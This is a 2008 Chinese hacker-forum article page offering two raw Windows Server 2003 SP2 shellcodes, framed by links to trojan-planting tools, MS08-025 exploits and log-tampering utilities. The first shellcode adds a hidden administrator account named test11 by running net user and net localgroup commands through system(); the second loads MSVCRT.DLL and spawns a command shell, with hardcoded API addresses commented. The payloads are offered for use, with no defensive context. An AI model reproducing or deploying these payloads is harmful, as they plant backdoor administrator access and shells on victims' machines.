·	两个shellcode	05-04	·	代理工具：CTProxy 1.0	05-04
·	强悍挂马工具：IIS_AD I	05-04	·	Windows XP with SP3 VO	05-04
·	易美网络提供1000M网络免	05-04	·	终点免费空间提供100M免	05-04
·	Vista中新增命令完整版	05-01	·	Windows系统中的“普通人	05-01
·	oxyhostsfree.com提供5G	05-01	·	实用技巧玩转Vista下备	04-29
·	V9站长天空提供200M高速	04-29	·	用WinHEX远程查杀顽固病	04-28
·	js下载者	04-28	·	又一个MS08-025溢出工具	04-28
·	MS08-025 for win2k & w	04-28	·	WEB暴力破解工具(wvs fu	04-28
·	最近比较流行的数据库挂	04-28	·	攻击木马–远程控制软件	04-28
·	仿SQLTOOLS 写的一个工具	04-28	·	输入小助手.vbs	04-28
·	logtamper-v1.0 修改lin	04-28	·	nasl插件生成器（带源码	04-28
·	OBlog 的SQL注入漏洞检测	04-28	·	经典Windows XP系统故障	04-28
·	全民红客 CNN攻击技术解	04-28	·	megalogs提供300MB免费p	04-28
·	Windows Vista虚拟化功能	04-27	·	硬盘故障排除大全	04-27

[推荐]两个shellcode

荐 ★★★★

两个shellcode

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-5-4 11:09:31

文章作者：pt007[at]vip.sina.com
信息来源：邪恶八进制信息安全团队(www.eviloctal.com)

注：文章首发I.S.T.O信息安全团队，后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有，转载需注明作者。
1、//win2003+sp2下加入一个test11/Test11!!!管理员用户的shellcode:

以下是引用片段：
unsigned char shellcode[]=
“\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x24″
“\xC6\x45\xDC\x6E\xC6\x45\xDD\x65\xC6\x45\xDE\x74\xC6\x45\xDF\x20\xC6\x45\xE0\x0D\xC6\x45\xE1\x75\xC6\x45\xE2\x73\xC6\x45\xE3\x65\xC6\x45\xE4\x72\xC6\x45\xE5\x20\xC6\x45\xE6\x0D\xC6\x45\xE7\x74\xC6\x45\xE8\x65\xC6\x45\xE9\x73\xC6\x45\xEA\x74\xC6\x45\xEB\x31\xC6\x45\xEC\x31\xC6\x45\xED\x20\xC6\x45\xEE\x0D\xC6\x45\xEF\x54\xC6\x45\xF0\x65\xC6\x45\xF1\x73\xC6\x45\xF2\x74\xC6\x45\xF3\x31\xC6\x45\xF4\x31\xC6\x45\xF5\x21\xC6\x45\xF6\x21\xC6\x45\xF7\x21\xC6\x45\xF8\x20\xC6\x45\xF9\x0D\xC6\x45\xFA\x2F\xC6\x45\xFB\x61\xC6\x45\xFC\x64\xC6\x45\xFD\x64\x8D\x45\xDC\x50\xB8\x83\xA0\xB8\x77\xFF\xD0″
“\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x34″
“\xC6\x45\xCC\x6E\xC6\x45\xCD\x65\xC6\x45\xCE\x74\xC6\x45\xCF\x20\xC6\x45\xD0\x0D\xC6\x45\xD1\x6C\xC6\x45\xD2\x6F\xC6\x45\xD3\x63\xC6\x45\xD4\x61\xC6\x45\xD5\x6C\xC6\x45\xD6\x67\xC6\x45\xD7\x72\xC6\x45\xD8\x6F\xC6\x45\xD9\x75\xC6\x45\xDA\x70\xC6\x45\xDB\x20\xC6\x45\xDC\x0D\xC6\x45\xDD\x61\xC6\x45\xDE\x64\xC6\x45\xDF\x6D\xC6\x45\xE0\x69\xC6\x45\xE1\x6E\xC6\x45\xE2\x69\xC6\x45\xE3\x73\xC6\x45\xE4\x74\xC6\x45\xE5\x72\xC6\x45\xE6\x61\xC6\x45\xE7\x74\xC6\x45\xE8\x6F\xC6\x45\xE9\x72\xC6\x45\xEA\x73\xC6\x45\xEB\x20\xC6\x45\xEC\x0D\xC6\x45\xED\x74\xC6\x45\xEE\x65\xC6\x45\xEF\x73\xC6\x45\xF0\x74\xC6\x45\xF1\x31\xC6\x45\xF2\x31\xC6\x45\xF3\x20\xC6\x45\xF4\x0D\xC6\x45\xF5\x2F\xC6\x45\xF6\x61\xC6\x45\xF7\x64\xC6\x45\xF8\x64″
“\x8D\x45\xCC\x50\xB8\x83\xA0\xB8\x77\xFF\xD0″;

2、/* 以下shellcode将开启一个command.com for win2k3+sp2 */

以下是引用片段：
“\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53″
“\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6″
“\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA”
“\xc6\x1d\x80\x7c” //2003 sp2上LoadLibraryA地址:0×7C801DC6
“\x52\x8D\x45\xF4\x50″
“\xFF\x55\xF0″
“\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E”
“\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4″
“\x50\xB8″
“\x83\xa0\xb8\x77″ //2003 sp1和sp2上system地址:0×77b8a083
“\xFF\xD0″;

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章： Windows XP with SP3 VOL MSDN 简体中文版

下一篇文章：没有了

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

完全解析网页后门和挂马	04-02
真实的网络攻击取证纪实	03-27
利用404错误页面挂马	03-21
解密风暴	03-21
社会工程学在黑客中的应用	01-02
轻轻松松解密各种网页木马	12-21
SA权限无xp_cmdshell时取权限又一	12-14
实现无net.exe和net1.exe添加系统	10-26
用U盘轻松去除XP管理员密码	10-26
教你多种保护措施限用移动硬盘	10-09
bat 延时执行命令	10-09
phpwind的一个放后门的方式	10-09